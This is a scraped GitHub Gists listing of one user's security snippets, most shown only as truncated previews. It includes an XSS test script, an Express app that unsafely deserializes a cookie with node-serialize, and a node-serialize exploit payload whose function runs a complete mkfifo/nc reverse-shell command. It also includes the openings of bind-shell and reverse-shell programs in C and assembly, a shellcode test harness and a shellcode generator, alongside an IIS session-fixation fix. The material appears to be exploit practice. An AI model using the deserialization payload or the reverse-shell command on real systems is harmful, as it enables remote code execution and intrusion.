Aditya Chaudhary AdityaChaudhary
AdityaChaudhary
/ alert.js
Last active
January 30, 2018 09:17
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| console.log('loaded'); | |
| alert(1); | |
| document.write(123); |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| var express = require('express'); | |
| var cookieParser = require('cookie-parser'); | |
| var escape = require('escape-html'); | |
| var serialize = require('node-serialize'); | |
| var app = express(); | |
| app.use(cookieParser()) | |
| app.get('/', function(req, res) { | |
| if (req.cookies.profile) { | |
| var str = new Buffer(req.cookies.profile, 'base64').toString(); |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| var serialize = require('node-serialize'); | |
| x = { | |
| test : function(){ return 'hi'; } | |
| }; | |
| console.log("Serialized: \n" + serialize.serialize(x)); | |
| /* |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| var serialize = require('node-serialize'); | |
| x = { | |
| test : function(){ | |
| require('child_process').execSync("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 127.0.0.1 4444 >/tmp/f", function puts(error, stdout, stderr) {}); | |
| } | |
| }; | |
| console.log("Serialized: \n" + serialize.serialize(x)); |
AdityaChaudhary
/ session_fixation_patch.asp
Last active
September 3, 2018 11:21
Workaround of Session Fixation in IIS6
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Session.Clear(); | |
| Session.Abandon(); | |
| Session.RemoveAll(); | |
| if (Request.Cookies["ASP.NET_SessionId"] != null) | |
| { | |
| Response.Cookies["ASP.NET_SessionId"].Value = string.Empty; | |
| Response.Cookies["ASP.NET_SessionId"].Expires = DateTime.Now.AddMonths(-20); | |
| } |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #include <stdio.h> | |
| #include <unistd.h> | |
| #include <sys/socket.h> | |
| #include <netinet/in.h> | |
| int main(void) { | |
| int socket_fd; | |
| int client_fd; | |
| socklen_t socklen; | |
| struct sockaddr_in srv_addr; | |
| struct sockaddr_in cli_addr; |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ; Bind Shellcode | |
| ; Author: Aditya Chaudhary | |
| ; Date: 6th Jan 2019 | |
| global _start | |
| section .text | |
| _start: | |
| xor eax, eax |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #include<stdio.h> | |
| #include<string.h> | |
| unsigned char code[] = \ | |
| "<shell_code_here>"; | |
| main() | |
| { | |
| printf("Shellcode Length: %d\n", strlen(code)); |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Python Shellcode Generator | |
| # Paste the shell code and use command line args to provide port number | |
| # python shellcode_gen.py 7777 | |
| #!/bin/python | |
| import sys, struct | |
| if (len(sys.argv) < 2): | |
| print "[#] Error: Please provide port number" | |
| else: |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #include <stdio.h> | |
| #include <strings.h> | |
| #include <sys/socket.h> | |
| #include <netinet/in.h> | |
| #define ADDR "127.0.0.1" | |
| #define PORT 7777 | |
| int main(void) { |
OlderNewer